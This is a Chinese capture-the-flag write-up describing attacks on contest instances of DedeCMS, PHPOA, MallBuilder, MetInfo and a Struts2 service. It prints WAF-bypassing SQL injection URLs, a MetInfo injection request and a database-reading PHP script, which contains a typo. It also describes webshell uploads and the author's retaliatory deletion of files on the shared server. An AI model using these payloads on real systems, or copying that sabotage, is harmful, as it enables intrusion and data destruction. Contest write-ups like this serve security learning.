48H极速夺旗大战-通关Writeup

  • 2016-06-16
  • 1,691
  • 1
题目名字 题目分值 地址
MallBuilder2 350 mall.anquanbao.com.cn
MallBuilder1 200 mall.anquanbao.com.cn
DedeCMS2 300 cms.anquanbao.com.cn
DedeCMS1 200 cms.anquanbao.com.cn
MetInfo2 300 info.anquanbao.com.cn
MetInfo1 200 info.anquanbao.com.cn
PHPOA2 200 oa.anquanbao.com.cn
PHPOA1 150 oa.anquanbao.com.cn
BugScan1 500 scan.anquanbao.com.cn

0x01DedeCMS

首先看到了织梦,直接admin 123456进去,发现左侧是空白

1111
通过文件直接访问文件管理器(/dede/file_manage_main.php?activepath=/uploads)在根目录下找到第一个flag,然后发现别人都瞬间750分了,然后挨个看了下flag.txt,拿到三个flag……

flag-1

上传之类的都不行,直接写个pht秒之,但是服务器奇卡,也是醉了,一句话连不上,上了个大马,然后找数据库配置文件,找到后发现不可读
正卡着的时候发现flag.txt被删了,后台密码也被改了,所以啊,,,就改了后台,删了好多重要文件,不怪我,谁让你们乱删的。。。
最后竟然发现文件都是777,然后把config改成了.txt,然后就读到了配置文件。

xx
不过waf甚至强大,可以登录数据库,可以看到表dede_flag,但是就是没法读取数据,索性写一个php文件读算了

shell

flag

0x02 PHPOA

这个乌云有案例:PHPOA系统通杀getshell,带脚本,任意文件上传。直接传个大马,这个数据库是可以直接读的,读到之后再写个php文件读取数据库中的flag。
但是现在(写writeup的时候)上面的方法已经不能用了,很多东西都过滤了,不过可以传一个一句话,然后post这样读……

1
然后写文件读取flag
2
getflag.php代码:

<?php 
$con = mysql_connect("localhost","root","2c2984bg");
$db_selected = mysql_selecst_db("flag",$con);
$sql = "SELECT * from flag";
$result = mysql_query($sql,$con);
while ($row = mysql_fetch_array($result)) {
	var_dump($row);
}
mysql_free_result($result);
mysql_close($con);
 ?>

0x03 MallBuilder

flag.txt这时候不能访问了,访问就405,随便加个post就绕过了

1

乌云搜了下,搜到了:MallBuilder 参数 brand 注入漏洞
但是只能读文件,怎么也绕不过waf,安全宝很强悍啊,什么都405
2
然后又搜到了一篇文章:一种目前通用的sql注入防御方式绕过(影响sqlchop、安全宝、阿里云等)。用小数去绕过空格

#order by 
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x' and 1=2.11111Order by 44%23
#终极payload
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x' and 1=2.2Union%0aSELECT%0a 1,2,3,4,5,(select name from flag),7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23

3

0x04 MetInfo

MetInfo 5.2.4,这个也是乌云案例:MetInfo最新版(5.2.4)一处SQL盲注漏洞
这个最简单的方法,直接把表名改成flag,然后会下载一个exec表格,打开就是flag,因为flag被设置成了表名……Orz

http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag -- ;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter

xx

yy

0x05 BugScan

这个首先随便试了下,Tomcat/7.0.68
找到了http://scan.anquanbao.com.cn/memoedit.action 猜测是struts2,用工具试了下,确实存在S2-032,然而waf却拦截了命令执行。
a
试了好多种绕过的方法都绕不过去,无论什么都拦截,也是奇葩啊,最后无奈了,还是用最传统的方法:超长URL绕过去了,100w+。flag在根目录下。
2
3
4

评论

你必须 登录 才能发表评论.